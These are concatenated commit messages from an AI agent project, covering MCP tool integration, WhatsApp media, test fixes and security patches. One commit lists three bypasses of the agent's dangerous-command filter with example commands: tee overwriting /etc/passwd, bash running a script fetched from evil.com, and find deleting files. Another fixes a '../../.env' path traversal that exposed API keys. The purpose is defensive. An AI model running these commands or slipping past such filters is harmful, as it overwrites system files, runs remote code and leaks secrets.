After /reload-mcp updates self.agent.tools, immediately call
_persist_session() so the session JSON file at ~/.hermes/sessions/
reflects the new tools list. Without this, the tools field in the
session log would only update on the next conversation turn — if
the user quit after reloading, the log would have stale tools.
- CLI: After reload, refreshes self.agent.tools and valid_tool_names
so the model sees updated tools on its next API call
- Both CLI and Gateway: Appends a [SYSTEM: ...] message at the END
of conversation history explaining what changed (added/removed/
reconnected servers, tool count). This preserves prompt-cache for
the system prompt and earlier messages — only the tail changes.
- Gateway already creates a new AIAgent per message so tools refresh
naturally; the injected message provides context for the model
Banner integration:
- MCP Servers section in CLI startup banner between Tools and Skills
- Shows each server with transport type, tool count, connection status
- Failed servers shown in red; section hidden when no MCP configured
- Summary line includes MCP server count
- Removed raw print() calls from discovery (banner handles display)
/reload-mcp command:
- New slash command in both CLI and gateway
- Disconnects all MCP servers, re-reads config.yaml, reconnects
- Reports what changed (added/removed/reconnected servers)
- Allows adding/removing MCP servers without restarting
Resources & Prompts support:
- 4 utility tools registered per server: list_resources, read_resource,
list_prompts, get_prompt
- Exposes MCP Resources (data sources) and Prompts (templates) as tools
- Proper parameter schemas (uri for read_resource, name for get_prompt)
- Handles text and binary resource content
- 23 new tests covering schemas, handlers, and registration
Test coverage: 74 MCP tests total, 1186 tests pass overall.
- Discovery is now parallel (asyncio.gather) instead of sequential,
fixing the 60s shared timeout issue with multiple servers
- Startup messages use print() so users see connection status even
with default log levels (the 'tools' logger is set to ERROR)
- Summary line shows total tools and failed servers count
- Validate conflicting config: warn if both 'url' and 'command' are
present (HTTP takes precedence)
- Update TODO.md: mark MCP as implemented, list remaining work
- Add test for conflicting config detection (51 tests total)
All 1163 tests pass.
Updated the README and messaging documentation to clarify the two modes for WhatsApp integration: 'bot' mode (recommended) and 'self-chat' mode. Improved setup instructions to guide users through the configuration process, including allowlist management and dependency installation. Adjusted CLI commands to reflect these changes and ensure a smoother user experience. Additionally, modified the WhatsApp bridge to support the new mode functionality.
When both OPENROUTER_API_KEY and OPENAI_API_KEY are set (e.g. OPENAI_API_KEY
in .bashrc), the wrong key was sent to OpenRouter causing auth failures.
Fixed key resolution order in cli.py and runtime_provider.py.
Fixes#289
- Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE)
to isolate real output from shell init/exit noise (oh-my-zsh, macOS
session restore/save, docker plugin errors, etc.)
- Expand _clean_shell_noise to cover zsh/macOS patterns and strip from
both beginning and end (fallback when fences are missing)
- Fix BSD find compatibility: fallback to simple find when -printf
produces empty output (macOS)
- Fix test_terminal_disk_usage: use sys.modules to get the real module
instead of the shadowed function from tools/__init__.py
- Add 13 new unit tests for fence extraction and zsh noise patterns
Add a /send-media endpoint to the WhatsApp bridge and corresponding
adapter methods so the agent can send files as native WhatsApp
attachments instead of plain-text URLs/paths.
- bridge.js: new POST /send-media endpoint using Baileys' native
image/video/document/audio message types with MIME detection
- base.py: add send_video(), send_document(), send_image_file()
with text fallbacks; route MEDIA: tags by file extension instead
of always treating them as voice messages
- whatsapp.py: implement all media methods via a shared
_send_media_to_bridge() helper; override send_image() to download
URLs to local cache and send as native photos
- prompt_builder.py: update WhatsApp and Telegram platform hints so
the agent knows it can use MEDIA:/path tags to send native media
- Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread)
- Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside
a _lock block but also acquires _lock (non-reentrant)
- Fix race condition in _ensure_mcp_loop with concurrent callers
- Change idempotency to per-server (retry failed servers, skip connected)
- Dynamic toolset injection via startswith("hermes-") instead of hardcoded list
- Parallel shutdown via asyncio.gather instead of sequential loop
- Add tests for partial failure retry, parallel shutdown, dynamic injection
Patch _servers to empty dict in tests that call discover_mcp_tools()
with mocked config, preventing interference from real MCP connections
that may exist when running within the full test suite.
When discover_mcp_tools() is called multiple times (e.g. direct call
then model_tools import), return existing tool names instead of opening
new connections that would orphan the previous ones.
Refactor MCP connections from AsyncExitStack to task-per-server
architecture. Each server now runs as a long-lived asyncio Task
with `async with stdio_client(...)`, ensuring anyio cancel-scope
cleanup happens in the same Task that opened the connection.
Connect to external MCP servers via stdio transport, discover their tools
at startup, and register them into the hermes-agent tool registry.
- New tools/mcp_tool.py: config loading, server connection via background
event loop, tool handler factories, discovery, and graceful shutdown
- model_tools.py: trigger MCP discovery after built-in tool imports
- cli.py: call shutdown_mcp_servers in _run_cleanup
- pyproject.toml: add mcp>=1.2.0 as optional dependency
- 27 unit tests covering config, schema conversion, handlers, registration,
SDK interaction, toolset injection, graceful fallback, and shutdown
Config format (in ~/.hermes/config.yaml):
mcp_servers:
filesystem:
command: "npx"
args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
Issue #263: Telegram/Discord/WhatsApp/Slack now show tool call details
based on display.tool_progress in config.yaml.
Changes:
- gateway/run.py: 'verbose' mode shows full args (keys + JSON, 200 char
max). 'all' mode preview increased from 40 to 80 chars. Added missing
tool emojis (execute_code, delegate_task, clarify, skill_manage,
search_files).
- agent/display.py: Added execute_code, delegate_task, clarify,
skill_manage to primary_args. Added 'code' and 'goal' to fallback keys.
- run_agent.py: Pass function_args dict to tool_progress_callback so
gateway can format based on its own verbosity config.
Config usage:
display:
tool_progress: verbose # off | new | all | verbose
Added a fixture to redirect HERMES_HOME to a temporary directory during tests, preventing writes to the user's home directory. Updated the test for DebugSession to create a dedicated log directory for saving logs, ensuring test isolation and accuracy in assertions.
Three attack vectors bypassed the dangerous command detection system:
1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env)
were not detected. tee writes to files just like > but was absent
from DANGEROUS_PATTERNS.
Example: echo 'evil' | tee /etc/passwd
2. curl/wget via process substitution bypassed the pipe-to-shell check.
The existing pattern only matched curl ... | bash but not
bash <(curl ...) which is equally dangerous.
Example: bash <(curl http://evil.com/install.sh)
3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not
caught. The pattern only matched bare rm, not absolute paths.
Example: find . -exec /bin/rm {} \;
The TestFlushSentinelNotLeaked test from PR #227 had two issues:
1. flush_memories() uses get_text_auxiliary_client() which could bypass
agent.client entirely — mock it to return (None, None)
2. No assertion that the API was actually called — added guard assert
Without these fixes the test passed vacuously (API never called).
The TestRetryExhaustion tests from PR #223 didn't mock time.sleep/time.time,
causing the retry backoff loops (275s+ total) to run in real time. Tests would
time out instead of running quickly.
Added _make_fast_time_mock() helper that creates a mock time module where
time.time() advances 500s per call (so sleep_end is always in the past) and
time.sleep() is a no-op. Both tests now complete in <1s.
The OpenAI API returns content: null on assistant messages with tool
calls. msg.get('content', '') returns None when the key exists with
value None, causing TypeError on len(), string concatenation, and
.strip() in downstream code paths.
Fixed 4 locations that process conversation messages:
- agent/auxiliary_client.py:84 — None passed to API calls
- cli.py:1288 — crash on content[:200] and len(content)
- run_agent.py:3444 — crash on None.strip()
- honcho_integration/session.py:445 — 'None' rendered in transcript
13 other instances were verified safe (already protected, only process
user/tool messages, or use the safe pattern).
Pattern: msg.get('content', '') → msg.get('content') or ''
Fixes#276
skill_view accepted arbitrary file_path values like '../../.env' and
would read files outside the skill directory, exposing API keys and
other sensitive data.
Added two layers of defense:
1. Reject paths with '..' components (fast, catches obvious traversal)
2. resolve() containment check with trailing '/' to prevent prefix
collisions (catches symlinks and edge cases)
Fix approach from PR #242 (@Bartok9). Vulnerability reported by
@Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR.
Closes#220
The OpenAI API returns content: null on assistant messages that only
contain tool calls. msg.get('content', '') returns None (not '') when
the key exists with value None, causing TypeError on len() and string
concatenation in _generate_summary and compress.
Fix: msg.get('content') or '' — handles both missing keys and None.
Tests from PR #216 (@Farukest). Fix also in PR #215 (@cutepawss).
Both PRs had stale branches and couldn't be merged directly.
Closes#211
Priority is: CLI arg > config file > env var > default
(not env var > config file as the old comment stated)
The test failed because config.yaml had max_turns at both root level
and inside agent section. The test cleared agent.max_turns but the
root-level value still took precedence over the env var. Fixed the
test to clear both, and corrected the comment to match the intended
priority order.
If any worker raises inside pool.imap_unordered(), the exception
propagates through the for loop and the results list is left
incomplete. The finally block correctly restores the log level but
the error is swallowed with no diagnostic information.
Added an explicit except block that logs the full traceback via
exc_info=True before re-raising, making batch worker failures
visible in logs without changing the existing control flow.
The Docker sandbox previously used --read-only on the root filesystem and
noexec on /tmp. This broke 30+ skills that need to install packages:
- npm install -g (codex, claude-code, mcporter, powerpoint)
- pip install (20+ mlops/media/productivity skills)
- apt install (minecraft-modpack-server, ml-paper-writing)
- Build tools that compile in /tmp (pip wheels, node-gyp)
The container is already fully isolated from the host. Industry standard
(E2B, Docker Sandboxes, OpenAI Codex) does not use --read-only — the
container itself is the security boundary.
Retained security hardening:
- --cap-drop ALL (zero capabilities)
- --security-opt no-new-privileges (no escalation)
- --pids-limit 256 (no fork bombs)
- Size-limited tmpfs for /tmp, /var/tmp, /run
- nosuid on all tmpfs mounts
- noexec on /var/tmp and /run (rarely need exec there)
- Resource limits (CPU, memory, disk)
- Ephemeral containers (destroyed after use)
Fixes#189.
logger.error() only records the exception message string, silently
discarding the stack trace. Switch to logger.exception() which
automatically appends the full traceback to the log output.
Without this change, when a tool handler raises an unexpected error
the log shows only the exception type and message, making it
impossible to determine which line caused the failure or trace
through nested calls.
Tests added:
- Roundtrip serialization of chat_topic via to_dict/from_dict
- chat_topic defaults to None when missing from dict
- Channel Topic line appears in session context prompt when set
- Channel Topic line is omitted when chat_topic is None
Follow-up to PR #248 (feat: Discord channel topic in session context).